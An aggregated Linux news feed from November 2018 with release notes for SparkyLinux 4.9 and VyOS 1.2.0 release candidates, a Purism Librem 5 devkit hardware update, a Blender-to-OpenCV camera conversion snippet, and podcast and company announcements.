Sparky 4.9 armhf offers a fully featured operating system for the Raspberry Pi single-board computer, with the Openbox window manager as default, as well as a minimal, text-mode CLI image to customize as you like.

Additionally, Sparky 4.9 is also offered as a special edition with the code name “100”. This very special edition commemorates the 100th anniversary of Poland’s independence; its purpose is to serve as a commemorative release that shares some of Poland’s history with users around the world.

The new iso images feature security updates and small improvements, such as:
– full system upgrade from Debian stable repos as of November 8, 2018
– Linux kernel 4.9.110 (PC)
– Linux kernel 4.14.71 (ARM)
– added key bindings for configuring monitor brightness (Openbox)
– added key bindings for configuring system sound (Openbox & LXDE)
– added cron configuration to APTus Upgrade Checker

Added packages:
– xfce4-power-manager for power management
– sparky-libinput for tap to click configuration for touchpads
– xfce4-notifyd for desktop notifications
– ‘sparky-artwork-nature’ package features 10 more new nature wallpapers of Poland

Changes in the „100” special edition:
– added „sparky100” theme pack, which provides a special background to: desktop, Lightdm login manager, GRUB/ISOLINUX boot manager and Plymouth
– added a sub-menu called „100”, available in English and Polish, which provides menu entries to Wikipedia so you can learn about the Polish National Independence Day and other important events in Polish history.

SparkyLinux 4.9 100

There is no need to reinstall existing Sparky installations of the 4.x line; simply perform a full system upgrade.

Sparky PC:
user: live
password: live
root password is empty

Sparky ARM:
user: pi
password: sparky
root password: toor

New iso/zip images of the stable edition can be downloaded from the download/stable page.

Many thanks go to Szymon “lami07” for testing, modifications and various improvements.

10 November, 2018 10:47PM by pavroo

November 09, 2018

VyOS


VyOS 1.2.0-rc6 is available for download

As usual, every week we make a new release candidate so that people interested in testing can test the changes quickly and people who reported bugs can confirm they are resolved or report further issues.

VyOS 1.2.0-rc6 is available for download from

It includes a small but significant number of bugfixes and a couple of removed commands.

Package updates

VyOS 1.2.0-rc6 uses Linux kernel 4.19.0. The 4.19 kernel will be the next LTS version, so it should be a good kernel to stick with for the lifetime of the 1.2.0 release.

The 4.18 kernel was quite buggy, and 4.14.75 had annoying bugs with small packets causing packet loss in Xen that were only solved in later versions.

This image also uses built-in drivers for Mellanox cards rather than those built from the official tarball, since they do not build for newer kernels yet. If you are using one of their fifth generation cards, let us know if it works for you.

Wireguard issues

Issues with creating multiple wireguard interfaces (T949) and with wireguard interfaces disappearing after reboot (T943) have been resolved.

Issues with removing long format IPv6 addresses from interfaces

It was always possible to use the long format of IPv6 addresses, with leading zeroes, like 2001:db8:0:0:0:0:0:1/64 (T288), but it was impossible to delete them without rebooting the router, because iproute2 compacts addresses at set time and doesn't recognize the short and long forms as the same address. We've added a workaround for it and it should no longer be a problem.
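The root cause is that the two spellings were compared as text. Parsed into canonical form, they are the same address, as this standalone Python sketch (using the standard ipaddress module, not VyOS code) illustrates:

```python
import ipaddress

# Zero-padded long form and compact short form of the same address
long_form = ipaddress.ip_interface("2001:db8:0:0:0:0:0:1/64")
short_form = ipaddress.ip_interface("2001:db8::1/64")

# Parsed properly, both spellings compare equal...
assert long_form == short_form

# ...and both render in the compact canonical form
print(long_form)   # 2001:db8::1/64
print(short_form)  # 2001:db8::1/64
```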

Import route-map not set for IPv4 BGP peer groups

There was an issue with setting import route-map for IPv4 peer groups (T924). I have to admit I simply forgot to convert one of the commands to the new "address-family ipv4-unicast" syntax, so the path existed in the CLI, but was never passed to FRR correctly. Now it should work as expected.

New command for checking VyOS installation integrity

If you, like me, can never remember if you are running a stock image or a modified installation, this is for you.

dmbaturin@vyos:~$ show system-integrity 
The following packages don't fit the image creation time:
build time:     2018-11-06 01:28:00
installed: 2018-11-06 01:44:28  vyos-1x

It only shows whether any packages were installed on top of the image, not whether any files were modified, but that's better than nothing.

Removed commands

The "run show vpn debug detail" operational mode command was removed because it was based on a script that StrongSWAN no longer provides, and reimplementing it is probably more trouble than it's worth since it just aggregates information already available in the logs and output of other commands.

We have also removed the "set service dhcp-relay relay-options port" command. Nowhere does the DHCP RFC say that servers or relays MAY use a port other than UDP/67, and almost no clients support alternative ports either, so this option hardly has any practical value. If you used to use it, it will disappear from your config. If you actually need it, please tell us about your use case.

09 November, 2018 10:55AM by Daniil Baturin

Ubuntu developers

Tiago Carrondo: S01E09 – Ano do Linux!?

The conversation covered the topic of the moment: the blue hat resulting from IBM's acquisition of Red Hat; (new) devices shipping with GNU/Linux, including System76's Thelio machines and Pine64's smartphone and tablet; UBports news; and the events happening very soon, with special emphasis on the Secure Open Source day, of which we are Media Partners and for which we will try to provide the best possible coverage for everyone who cannot attend, among other things!

You know the drill: listen, subscribe and share!


This episode was produced and edited by Alexandre Carrapiço (Thunderclaws Studios – sound capture, production, editing, mixing and mastering). Contact: thunderclawstudiosPT–arroba–

Attribution and licenses

The cover image is by q.phia on Visualhunt and is licensed CC BY.

The theme music is “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)” by Alpha Hydrae and is licensed under the CC0 1.0 Universal License.

This episode is licensed under the Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0) license, whose full text can be read here. We are open to licensing for other types of use; contact us for validation and authorization.

09 November, 2018 12:49AM

Purism PureOS

Librem 5 Development Kits: we are getting there!

A few weeks ago we published an update about our forthcoming Librem 5 development kits, after we ran into some issues which caused delays. Today we’re bringing you another update on the hardware fabrication process, as well as some pictures and a video. Around the time the last update was posted, I was on my way to California, where we are fabricating our development kit and base boards (we are bringing everything to life there, and shipping from that same facility).

The story of fabricating the entire devkit hardware from the ground-up included crossing paths with a couple of storms:

  • Hurricane Florence caused some shipping delays for component parts, and one of our packages also got lost in Memphis—maybe it enjoyed the music and drinks a bit too much? We don’t know because we never heard back from it again. So we had to procure additional parts.
  • The typhoon in south east China caused a week of factory shutdowns, which included our PCB design prototypes!
  • Almost right after that was a Chinese holiday, the Golden Week, which is in practice a two week holiday. Luckily we could expedite the PCBs at a fab in Los Angeles and courier ship to us!

All in all, we had a setback of about three weeks before we were able to make the first prototypes of the boards.

So once the PCBs finally arrived, on the same day we set up all the machines and worked until 5 a.m. to make the first 10 “golden sample” prototypes of the development base boards:

If you compare the produced boards with the 3D renders from KiCad (yes, the design of the base board is done in KiCad, and we will be releasing it under a free license once we are finished), you can see the beautiful similarity of the actual outcome. Here we have from left to right: the back side 3D render, the freshly made real board’s back side; the 3D rendered front and real board’s front:

Since then, our team has been furiously and restlessly working on “bringing up” the board, i.e. getting software up and running at least “as far as to be able to test all the peripherals” so that we can verify the base board design before we order the final 300+ boards for series production.

Since we base all our work on current mainline Linux kernel 4.18+, this work also involves quite a lot of forward porting of drivers, bug fixing and walking uncharted territory since the i.MX 8M is still very new. So far we have been able to verify the following (which also gives you an impression of the complexity of this task):

Validated Hardware Subsystems

  • Charge Controller
  • USB-C
  • Serial Downloader (loading u-boot via USB)
  • eMMC boot (boot mode switch in the “up” position)
  • SoM (pinout mostly validated, SoC, eMMC, and PMIC working)
  • UART Debug
  • Powering from 18650 battery
  • Charge controller’s thermistor
  • 10/100 Ethernet
  • Audio Codec
  • Mini-HDMI
  • WWAN module, SIM card & antenna
  • WWAN hardware kill switch
  • GNSS (UART interface & antenna)
  • USB Hub & SD controller
  • RedPine WiFi/BT M.2 module on SDIO
  • RTC
  • Haptic motor
  • push buttons (power button, reset button, volume up, & volume down)
  • User LED
  • Power indicator LEDs
  • headphones detect (HP_DET)
  • Display’s LED backlight
  • SPI NOR Flash
  • Earpiece speaker
  • External microphone
  • Headphone speakers
  • Smart card reader & smart card slot

Partially Validated Hardware Subsystems

  • IMU (accelerometer, gyro & magnetometer)
  • Proximity / ambient light sensor
  • WLAN/BT antennae
  • On-board microphone
  • Headset microphone
  • hardware kill switches for WiFi / BT and microphone

Subsystems Left To Validate

  • MIPI DSI LCD panel
  • Touch controller
  • Safely charging an 18650 battery
  • USB-C role switching
  • Microphone select IC
  • Bluetooth (UART4)
  • Camera (MIPI CSI)
  • WWAN I2S interface
  • JTAG
  • Bluetooth I2S interface

The MIPI DSI display interface is of course extremely important, and we can not order the final batch of PCBs before we know that the display (and touch controller) work perfectly. By doing the verification we also indeed discovered some problems, minor things that did not behave as expected and which we are now able to fix. Some other issues are simply mechanical issues that are hard to evaluate just from all the datasheets. And then other things happen, like parts not conforming to standards (like the M.2 WiFi/BT card, of which we got samples just a few days after doing the prototype order). For example, the M.2 card has some pretty thick components on the bottom layer and thus can not lay flush on the PCB (which had been an assumption we had when we designed the board), so we need to change the connector for the final boards.

This is how the fully equipped current devkit prototypes look; the WiFi/BT card can be seen in the lower right corner of the back side:

We are getting there!

All parts for the final production of the dev kits are procured and still waiting in the magazines on the machines to be placed on the final boards. The kernel team is making amazing progress on mainline Linux 4.18+, we are in intense communication with other Linux i.MX 8M mainlining partners. The kernel, the GPU drivers and MESA will see quite some i.MX 8M patches from us—and yes, upstream first was and is our motto, everything we do is and will be pushed upstream!

After all this, I am reluctant to give a new timeline for shipping the dev kits… What we know is that our new PCB fabrication here in the USA will be 11 business days. We will make over 300 of these boards, which are pretty complex—we have over 160 different parts and more than 500 components in total per board. This takes some time, even with the amazing SMT machines placing tiny parts (such as 0201 SMD types). I wouldn’t be able to place these by hand!

From testing the prototypes, it will probably take another week (probably two) until we can give the green light for PCB fabrication to begin, then about two weeks for them to be fabricated, and another week for production, assembly, testing and shipping. As you can see, with all that, we will likely roll into December. With that said however, we are doing our very best to ship out all boards in the early part of December, so that all backers should get their new toys well before the end of the year (given the shipping carriers don’t cause delays).

Thank you for all the active community development and tremendous support! See our video below on how these boards are being put together. Oh and by the way, we have a little survey for you, check out our enterprise page if you’d like to help!

09 November, 2018 12:18AM by Nicole Faerber

November 08, 2018

Maemo developers

From Blender to OpenCV Camera and back

In case you want to employ Blender for Computer Vision, e.g. for generating synthetic data, you will need to map the parameters of a calibrated camera to Blender, as well as map the Blender camera parameters to those of a calibrated camera.

Calibrated cameras typically base around the pinhole camera model which at its core is the camera matrix and the image size in pixels:

K = \begin{bmatrix}f_x & 0 & c_x \\ 0 & f_y& c_y \\ 0 & 0 & 1 \end{bmatrix}, (w, h)

But if we look at the Blender Camera, we find lots of non-standard and duplicate parameters, some with unusual units and some without any, like

  • unitless shift_x
  • duplicate angle, angle_x, angle_y, lens

After doing some research on their meaning and fixing various bugs in the proposed conversion formulas, I came up with the following Python code to do the conversion from Blender to OpenCV:

# get the relevant data (run inside Blender, where bpy is available)
import bpy

cam =["cameraName"].data
scene = bpy.context.scene
# assume image is not scaled
assert scene.render.resolution_percentage == 100
# assume angles describe the horizontal field of view
assert cam.sensor_fit != 'VERTICAL'

f_in_mm = cam.lens
sensor_width_in_mm = cam.sensor_width

w = scene.render.resolution_x
h = scene.render.resolution_y

pixel_aspect = scene.render.pixel_aspect_y / scene.render.pixel_aspect_x

f_x = f_in_mm / sensor_width_in_mm * w
f_y = f_x * pixel_aspect

# yes, shift_x is inverted. WTF blender?
c_x = w * (0.5 - cam.shift_x)
c_y = h * (0.5 + cam.shift_y)

K = [[f_x, 0, c_x],
     [0, f_y, c_y],
     [0,   0,   1]]

So to summarize the above code

  • Note that f_x/ f_y encodes the pixel aspect ratio and not the image aspect ratio w/ h.
  • Blender enforces identical sensor and image aspect ratio. Therefore we do not have to consider it explicitly. Non square pixels are instead handled via pixel_aspect_x/ pixel_aspect_y.
  • We left out the skew factor s (non rectangular pixels) because neither OpenCV nor Blender support it.
  • Blender allows us to scale the output, resulting in a different resolution, but this can be easily handled post-projection. So we explicitly do not handle that.
  • Blender has the peculiarity of converting the focal length to either horizontal or vertical field of view (sensor_fit). Going the vertical branch is left as an exercise to the reader.

The reverse transform can now be derived trivially as

cam.shift_x = -(c_x / w - 0.5)
cam.shift_y = c_y / h - 0.5

cam.lens = f_x / w * sensor_width_in_mm

pixel_aspect = f_y / f_x
scene.render.pixel_aspect_x = 1.0
scene.render.pixel_aspect_y = pixel_aspect
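As a quick sanity check, the forward and reverse formulas round-trip cleanly with plain numbers in place of the bpy objects (the parameter values below are arbitrary examples):

```python
# Arbitrary example parameters standing in for the Blender camera
f_in_mm, sensor_width_in_mm = 35.0, 32.0
w, h = 1920, 1080
pixel_aspect = 1.0
shift_x, shift_y = 0.05, -0.02

# Forward: Blender parameters -> camera matrix entries
f_x = f_in_mm / sensor_width_in_mm * w
f_y = f_x * pixel_aspect
c_x = w * (0.5 - shift_x)
c_y = h * (0.5 + shift_y)

# Reverse: camera matrix entries -> Blender parameters
shift_x_back = -(c_x / w - 0.5)
shift_y_back = c_y / h - 0.5
lens_back = f_x / w * sensor_width_in_mm

# The round trip recovers the original parameters exactly
assert abs(shift_x_back - shift_x) < 1e-9
assert abs(shift_y_back - shift_y) < 1e-9
assert abs(lens_back - f_in_mm) < 1e-9
```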

08 November, 2018 05:12PM by Pavel Rojtberg (

Cumulus Linux

Cumulus content roundup: October

We’re back with the Cumulus content roundup – October edition. We’ve kept busy this month with a new whiteboarding video series, podcasts, resources and more. Covering everything from open source to digital transformation, we’ve rounded it all up right here, so settle in and stay a while!

From Cumulus Networks:

Preparing your network for digital transformation: Learn about the primary challenges with digital transformation and how web-scale networking principles make digital transformation possible and profitable. Is your network ready for the future?

Web-scale networking for cloud service providers: Find out why cloud service providers need to have agile, highly scalable and cost effective infrastructure in order to stand out to their customers.

Our dedicated approach to open source networking: Read our philosophy and how we’ve contributed to and participated in the open source community.

Web-scale Whiteboarding: Openstack Overview: Watch our brand new series of whiteboarding videos with our very own Pete Lumbis

Kernel of Truth: Episode 9: Tune into this podcast episode as we dive into Layer 3 networking and why we believe it’s the future of network design.

News from the web:

Gartner Peer Insights: See the full list of companies recognized for Best Data Networking of 2018, including Cumulus Networks!

Fortune Best 2018: Cumulus Networks won Best 100 Medium Size Company to work for. Read all about it here.

Open Stack Summit Berlin 2018: Cumulus Networks is a returning sponsor at OpenStack Summit in Berlin! Stop by booth C18 to learn how you can maximize your OpenStack cloud with Cumulus Linux. You’ll also have the chance to win some awesome prizes!

To learn more about how our solution integrates with OpenStack, check out our theater session on day 1 of the event with iNNOVO Cloud: Tuesday, November 13th from 12:00 – 12:20 PM.



The post Cumulus content roundup: October appeared first on Cumulus Networks engineering blog.

08 November, 2018 03:16PM by Alexandra Jorde

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Podcast from the UK LoCo: S11E35 – Stranger on Route Thirty-Five

This week we’ve been using Windows Subsystem for Linux and playing with a ThinkPad P1. IBM buys Red Hat, System76 announces their Thelio desktop computers, SSD encryption is busted, Fedora turns 15, IRC turns 30 and we round up the community news.

It’s Season 11 Episode 35 of the Ubuntu Podcast! Alan Pope, Mark Johnson and Martin Wimpress are connected and speaking to your brain.

In this week’s show:

That’s all for this week! You can listen to the Ubuntu Podcast back catalogue on YouTube. If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

08 November, 2018 03:00PM


Restart Verwaltung – Impulse des Open Government Tag 2018

The world around us is shaped by digital transformation. The constant advancement of technology is only one aspect of it. Far more significant is the societal change that affects citizens, politics, and business, as well as us as … Read more

The post Restart Verwaltung – Impulse des Open Government Tag 2018 first appeared on Münchner IT-Blog.

08 November, 2018 10:19AM by Lisa Zech

November 07, 2018

hackergotchi for ZEVENET


Black Friday Campaign has been launched

Black Friday is great for online shopping, but it can be a nightmare for the sysadmins, DevOps engineers, and site reliability engineers behind retailers, logistics companies, and payment gateways, due to traffic far above the usual peak on their online stores. Zevenet is ready to strengthen business continuity and accelerate your services. Discover how in our new campaign dedicated to Black Friday.


07 November, 2018 02:36PM by Zevenet

hackergotchi for Ubuntu developers

Ubuntu developers

Kubuntu General News: Plasma 5.14.3 update for Cosmic backports PPA

We are pleased to announce that the 3rd bugfix release of Plasma 5.14, 5.14.3, is now available in our backports PPA for Cosmic 18.10.

The full changelog for 5.14.3 can be found here.

Already released in the PPA is an update to KDE Frameworks 5.51.

To upgrade:

Add the following repository to your software sources list:


or if it is already added, the updates should become available via your preferred update method.

The PPA can be added manually in the Konsole terminal with the command:

sudo add-apt-repository ppa:kubuntu-ppa/backports

and packages then updated with

sudo apt update
sudo apt full-upgrade



Please note that more bugfix releases are scheduled by KDE for Plasma 5.14, so while we feel these backports will be beneficial to enthusiastic adopters, users wanting to use a Plasma release with more stabilisation/bugfixes ‘baked in’ may find it advisable to stay with Plasma 5.13.5 as included in the original 18.10 Cosmic release.

Should any issues occur, please provide feedback on our mailing list [1], IRC [2], and/or file a bug against our PPA packages [3].

1. Kubuntu-devel mailing list:
2. Kubuntu IRC channels: #kubuntu & #kubuntu-devel on
3. Kubuntu ppa bugs:

07 November, 2018 12:44PM

hackergotchi for VyOS


VyOS 1.2.0 development news in July

Despite the slow news season and the RAID incident that luckily slowed us down only for a couple of days, I think we've made good progress in July.

First, Kim Hagen got cloud-init to work, even though it didn't make it to the mainline image, and WAAgent required for Azure is not working yet. Some more work, and VyOS will get a much wider cloud platform support. He's also working on Wireguard integration and it's expected to be merged into current soon.

The new VRRP CLI and IPv6 support is another big change, but it got its own blog post, so instead I'll cover things that did not get their own posts.

IPsec and VTI

While I regard VTI as the most leaky abstraction ever created and always suggest using honest GRE/IPsec instead, I know many people don't really have any choice because their partners or service providers are using it. In older StrongSWAN versions it used to just work.

Updating StrongSWAN to the latest version had an unforeseen and very unpleasant side effect: VTI tunnels stopped working. A workaround, setting "install_routes = no" in /etc/strongswan.d/charon.conf, was discovered, but it has an equally bad side effect: site to site tunnels stop working when it is applied.
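For reference, the workaround goes into the charon section of that file. A sketch (and remember the side effect just mentioned: with this set, site to site tunnels stop working):

```
# /etc/strongswan.d/charon.conf
charon {
    # Do not let StrongSWAN install routes for established SAs
    install_routes = no
}
```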

The root cause of the problem is that for VTI tunnels to work, their traffic selectors have to be set to for traffic to match the tunnel, even though actual routing decision is made according to netfilter marks. Unless route insertion is disabled entirely, StrongSWAN thus mistakenly inserts a default route through the VTI peer address, which makes all traffic routed to nowhere.

This is a hard problem without a workaround that is easy and effective. It's an architectural problem in the new StrongSWAN: according to our investigation of its source code and the developers' responses, there is simply no way to control route insertion per peer. One developer responded to it with "why, site to site and VTI tunnels are never used on the same machine anyway" — yeah, people are reporting bugs just out of curiosity.

While there is no clean solution within StrongSWAN, this definitely has been a blocker for the release candidate. Reimplementing route insertion with an up/down script proved to be a hard problem since there are lots of cases to handle and complete information about the intended SA may not always be available to scripts. Switching to another IKE implementation seems like an attractive option, but needs a serious evaluation of the alternatives, and a complete rewrite of the IPsec config scripts — which is planned, but will take a while because the legacy scripts are an unmaintainable mess.

I think I've found a workable (even if far from perfect) workaround — instead of inserting missing routes, delete the bad routes. I've made a test setup and it seems to work reasonably well. The obvious issue is that it doesn't prevent bad things from happening, but rather undoes the damage, so there may still be a brief traffic disruption when VTI tunnels go up. Another problem is a possible race condition between StrongSWAN inserting routes and the script deleting them, though I haven't seen it in practice yet and I hope it doesn't exist. But, at least you can now use both VTI and site to site tunnels on the same machine.

For people who want to use VTI exclusively, there is now a "set vpn ipsec options disable-route-autoinstall" option that disables route insertion globally, thus removing the possible disruption, at the cost of making site to site tunnels impossible to use. That option is disabled by default.

I hope it will be good enough until we find a better solution. Your testing is needed to confirm that it is!

07 November, 2018 07:15AM by Daniil Baturin

VyOS development news in August and September

Most importantly: all but one blockers for the 1.2.0 release candidate are now resolved. Quite obviously, for the release candidate, we want all features that worked in 1.1.8 to work fully.

New release naming scheme

While we are at it, I'd like to announce a small cosmetic change. Until now, our release branches were named after chemical elements. This naming scheme is getting a bit too common, though (OpenDaylight is a well-known example, but there are more), so we decided to change it to something else to avoid confusion and be a bit more original.

The new branch theme is constellations sorted by area (in square degrees), from the smallest to the largest. The 1.2.0 release will be named Crux. Crux, also known as the Southern Cross, is a small but bright and iconic constellation that is depicted on flags of many countries of the southern hemisphere, such as Australia and New Zealand.

The 1.3.0 release will be named Equuleus, which is Latin for "little horse" (no relation to My Little Pony).

Migration to FRR from Quagga

We have resolved most of the migration problems and latest nightly builds already use FRR instead of our aged Quagga.

It will open a path to implementing many new protocols and features, such as BFD, PIM-SM, and more. What kept us from migrating was lack of support for multiple routing tables, which we need for PBR. FRR added it recently, and by now the last known issue that blocked migration (routes from the default table unintentionally leaking into non-default tables) has been resolved, so we finally can migrate without losing any features.

While I do feel somewhat uneasy about licensing of certain daemons, that are included in the source tree but use a permissive open source license even though they are linked against GPL libraries, we do not believe there's a GPL violation in it as long as the license of the binary package is GPL. Not sharing a modified source code of those daemons with users of the binary package would be a GPL violation, but we keep all source code of every VyOS component public.

New BGP address-family syntax

This is still in the works, but it will make it to the nightly builds soon.

Originally, VyOS used to have IPv6-specific BGP options under "address-family ipv6-unicast", but IPv4 options were directly under neighbor. The historical reason is that originally IPv6 BGP was not supported at all. This syntax was rather inconsistent, and made it hard to quickly see which options are address family specific. We used to stick with that inconsistent syntax just because it was always done that way.

One behaviour change in FRR made us reconsider that. As you may know, in BGP, routing information exchange is completely orthogonal to the session transport: IPv4 routes can be exchanged over a TCP connection established between IPv6 addresses and vice versa. The default behaviour of most, if not all, BGP implementations is to enable both address families regardless of the session transport.

That behaviour can be changed by an option; in VyOS, that's "set protocols bgp ... parameters default no-ipv4-unicast". The old behaviour of Quagga was to apply that only to sessions whose transport is IPv6, which is just as inconsistent. FRR takes that option literally and disables IPv4 route advertisements for all peers if it's active, unless peers are explicitly activated for the IPv4 address family.

Making VyOS play well with that development requires an option to do that, and "address-family ipv4-unicast" is an obvious candidate, but introducing a special case doesn't feel right. I think moving the original options to that subtree is a cleaner solution. Yes, it does require reprogramming your fingers, but when we start adding support for more address families, the original syntax will only start looking even more like an atavism.

This is what the new syntax will look like:
dmbaturin@vyos# show protocols bgp
 bgp 64444 {
     address-family {
         ipv4-unicast {
             network {
             }
         }
     }
     neighbor {
         address-family {
             ipv4-unicast {
                 allowas-in {
                     number 3
                 }
                 default-originate {
                     route-map Foo
                 }
                 maximum-prefix 50
                 route-map {
                     export Bar
                     import Baz
                 }
                 weight 10
             }
         }
         ebgp-multihop 255
         remote-as 64793
     }
 }

Node renaming in migration scripts

Renaming nodes is a very common task in config syntax migration, but until now it could only be done very indirectly. The old XorpConfigParser simply could not separate names from values and renaming nodes was usually done by regex replace. In the new vyos.configtree you'd need to delete the old node and recreate it from scratch.

Until now. Lately we introduced a function that does it in one step. If you, for whatever reason, wanted to rename the "service ssh" subtree to "service secure-shell", you could do it like this:

import vyos.configtree

with open("/config/config.boot") as f:
    config_text = f.read()

config = vyos.configtree.ConfigTree(config_text)
config.rename(["service", "ssh"], "secure-shell")


One of the reasons for introducing it is to make it easier to clean up the DHCP server syntax.

DHCP server rewrite

While we are waiting for the FRR fixes, we (Christian Poessinger and I mainly) decided to eliminate one more bit of the legacy code and give DHCP server scripts a rewrite. We also decided to clean up its syntax.

One of the things that always annoyed me was nested nodes for address ranges: "subnet start stop". Now start and stop will be different nodes, so that they are easy to change independently: "subnet range Foo start; ... stop".

We will also rename the unwieldy "shared-network-name" to "pool". Operational mode commands always used the "pool" terminology, so it will also improve command consistency.
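Put together, the planned cleanup sketched above would look roughly like this (illustrative only: the "LAN" pool name is an assumption, "Foo" is the range name from the example above, and address values are elided as elsewhere in this post):

```
# Old syntax: start and stop nested under a single node
set service dhcp-server shared-network-name LAN subnet ... start ... stop ...

# New syntax: "pool" instead of "shared-network-name", with start and stop
# as separate nodes under a named range
set service dhcp-server pool LAN subnet ... range Foo start ...
set service dhcp-server pool LAN subnet ... range Foo stop ...
```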

Wireguard support

Thanks to our contributor who goes by hagbard, VyOS now supports wireguard. The work on it is nearly complete, and will be covered in a separate post.

TFTP server support

Thanks to Christian Poessinger, VyOS now has a TFTP server. It was a frequently requested feature, and I think it makes sense for people who keep DHCP on the router and do not want to set up another machine for provisioning phones, thin clients and so on.

This is an example of TFTP server with all options set:

service {
 tftp-server {
     directory /config/tftp
     port 69
 }
}
DMVPN works again

Thanks to our contributor Runar Borge, we have identified the cause and fixed the issues that broke DMVPN after upgrading to the latest upstream StrongSWAN. It should now work as expected.

L2TP/IPsec works again

One of the blockers introduced by upgrade to StrongSWAN 5.6 was broken L2TP/IPsec. We've adjusted the config to use the new syntax and now it works again.

More to come

We are actively working on getting the codebase ready for the release candidate. Stay tuned for new updates!

07 November, 2018 07:15AM by Daniil Baturin

First VyOS 1.2.0 release candidate is available for download

This month, the VyOS project turns five years old. In these five years, VyOS has been through highs and lows, up to speculation that the project is dead. The past year has been full of good focused work by the core team and community contributors, but the only way to make use of that work was to use nightly builds, and nightly builds are like a box of chocolates, or rather a box of WWI era shells—you never know if one blows up when handled or not. Now the codebase has stabilized, and we are ready to present a release candidate. While it has some rough edges, a number of people, including us, are already using recent builds of VyOS 1.2.0 in production, and now it's time to make it public.

VyOS 1.2.0-rc1 is available for download from

VyOS 1.2.0 (Crux) is the feature expansion release based on Debian Jessie. The release candidate will be the basis for the future long term support release. You can read the full release notes at

New features include:

  • Wireguard support
  • PPPoE server
  • mDNS repeater and broadcast relay
  • Support for IPv6 VRRP and unicast VRRP operation
  • NPTv6
  • Standards-compliant QinQ ethertype option
  • Python APIs for accessing the running config and writing migration scripts (replacements of the Perl Vyatta::Config and XorpConfigParser)
  • New XML-based command definitions
  • New build system that makes it easy to create custom builds with additional repositories and packages
  • SR-IOV support for Intel and Mellanox cards

The following features have been removed:

  • Telnet server
  • p2p filtering

While the base system is Debian Jessie, multiple packages have been updated to much newer versions, for example, the 4.14.65 kernel, StrongSWAN 5.6, and keepalived 2.0.5.

Additionally, our old Quagga has been replaced with FRR, which opens a way to adding support for many more protocols, including multicast routing.

Known issues

Some people reported issues with DMVPN in hub mode (T848).

Some people report an issue with routers responding to all ARP requests when VTI is enabled (T852).

If you use DMVPN or VTI, you may either help with testing and debugging those issues, or wait until the issues are confirmed to be resolved.

What's next

VyOS 1.2.0 will become the LTS release after one or more release candidates.

We are preparing a release model change that will involve splitting VyOS into an LTS branch and a (roughly) monthly rolling release made from the latest code from the current branch. Both branches will be entirely open source, but while the rolling release builds will be available free of charge to everyone, the LTS ISO image builds will be only available to those who either contribute to VyOS (code, documentation, and community activities all count) or purchase a subscription. There will always be an option to build the LTS image entirely from source or using package repositories at, though commercial support will only be provided for official builds, or by special arrangement.

We are also working on new commercial support plans and pricing models.

The current branch will now be used for developing 1.3.0. Top priorities for 1.3.0 include migration to the next Debian release and rewriting more legacy code to enable better testing and easier addition of new features.

In a sense, VyOS 1.2.0 was a test whether the project can exist independently or not. While 1.1.x was an incremental expansion of the last Vyatta Core release, development of 1.2.0 coincided with mainstream Linux distributions switching to systemd, many packages such as StrongSWAN making big incompatible changes, and parts of VyOS itself reaching the point when bugs could no longer be fixed without a complete rewrite. The build system also had to be rewritten from scratch.

A lot of work went into developing the new infrastructure for Python rewrites, including the new system of command definitions and required libraries. By now a few components including SSH, SNMP, cron, and DNS forwarding have been rewritten in the new way, and the rewrite movement is gaining momentum.

Let's test and polish the 1.2.0 release, and keep working on making VyOS a better, more easily maintainable platform in the future 1.3.0 release.

07 November, 2018 07:01AM by Daniil Baturin

VyOS 1.2.0-rc2 is available for download, with fixes to wireguard and PBR

The second release candidate is available for download from

We are happy to see so many people test the release candidates! Some bugs were already found and fixed, and we are working on some more bugs found since the release of 1.2.0-rc1. To make the already completed fixes available, we are making the second release candidate.

Resolved issues

  • Wireguard module not loading (T881).
  • PBR routes leaking into other tables (T882).
  • Unhandled exception in the wireguard op mode (T883).

Known issues

  • Failure to add an OpenVPN interface to a bridge group if cost is not specified (T884, let us know if you also see it).
  • commit-confirm doesn't cancel reboot properly (T870).
  • The GPG key for release builds is not included in the image

Stay tuned for the rc3!

07 November, 2018 07:01AM by Daniil Baturin

VyOS 1.2.0-rc3 is available for download, with BGP large communities and new bugfixes

VyOS 1.2.0-rc3 release candidate is available for download from

Thanks to all the people testing release candidates, more bugs were uncovered and fixed. This release also includes a new feature that was made possible by the migration away from our outdated Quagga, namely:

BGP large communities

Since we are using FRR rather than an outdated Quagga version now, we could finally add CLI support for a long requested feature: large communities. Now that RIRs are handing out 32-bit AS numbers, it's more relevant than ever.

The syntax is very simple and similar to that of community-lists:
set policy large-community-list Foo rule 10 action permit
set policy large-community-list Foo rule 10 regex 4000000:33333:4444
set policy large-community-list Foo rule 20 action deny
set policy large-community-list Foo rule 20 regex '^$'

set policy route-map Bar rule 10 action permit
set policy route-map Bar rule 10 match large-community large-community-list Foo

set policy route-map Quux rule 10 action permit
set policy route-map Quux rule 10 set large-community 90000:555:111

Note that there are no well-known communities such as "no-export" here, unlike in the classic communities. I also decided not to implement support for "standard" (numbered) large-community-lists and only include "expanded" (named) lists.

Now to the bug fixes.

Directly connected interface-routes

Some hosting providers, for example,, use an unusual configuration with /32 host addresses, where you are supposed to create an interface-based route to the default gateway address and then create a default route via that address.

While this configuration is against the classic networking common sense, and I'm not a fan of it, it's technically perfectly valid and increasingly common. The Linux kernel network stack uses a "you asked for it, you get it" approach and allows you to do any crazy things, which sometimes turn out surprisingly useful. Our old Quagga, however, would treat such routes as unreachable because the next hop address is not from the same network as assigned on the interface — sound reasoning, but in this situation it was wrong.

The only way to make it work was to add an iproute2 command to the postconfig script, which is cumbersome. Migration to FRR seems to have resolved that issue though. This configuration appears to work fine in my lab:

set interfaces ethernet eth1 address
set protocols static interface-route next-hop-interface eth1
set protocols static route next-hop

This is what the route table looks like: the route is treated as directly connected.

vyos@vyos# run show ip route
S> [1/0] via (recursive), 00:00:03
  *                   via, eth1 onlink, 00:00:03
C>* is directly connected, eth1, 00:00:03
S>* [1/0] is directly connected, eth1, 00:00:03

And this is what it looks like in the kernel:

vyos@vyos# run show ip route forward 
default via dev eth1 proto static metric 20 onlink dev eth0 proto kernel scope link src dev eth1 proto static metric 20 

If you are using or another hosting provider that uses this scheme, please test it and tell us if it works for you without workarounds.

Fixes in bridging and tunnels

Thanks to Kroy from the forum, we tracked down and fixed a few bridging bugs that had been there for a long time but no one noticed.

